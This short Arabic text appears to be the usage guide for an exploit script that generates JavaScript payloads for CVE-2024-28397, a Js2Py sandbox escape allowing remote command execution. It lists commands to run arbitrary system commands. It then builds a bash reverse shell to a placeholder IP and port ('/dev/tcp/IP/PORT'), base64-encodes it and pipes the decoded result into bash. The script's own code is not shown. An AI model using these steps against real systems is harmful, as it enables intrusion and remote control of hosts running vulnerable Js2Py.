
توليد حمولات JavaScript لاستغلال ثغرة CVE-2024-28397 الهروب من صندوق الرمل Js2Py، مما يتيح تنفيذ الأوامر عن بُعد وقذائف عكسية عبر تعريض دواخل Python.
يقوم هذا البرنامج النصي بتوليد حمولة JavaScript يمكن تقييمها بواسطة Js2Py في بيئات ضعيفة حيث يتم كشف العناصر الداخلية للبايثون عبر مغلفات الكائنات.
تنفيذ أمر أساسي:
python3 cve-2024-28397.py -c "id"
توليد حمولة مدمجة في سطر واحد:
python3 cve-2024-28397.py -c "whoami" --compact
توليد حمولة Base64:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
توليد حمولة Js2Py:
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
استبدل BASE64_OUTPUT بالسلسلة النصية Base64 التي تم توليدها في الخطوة الأولى.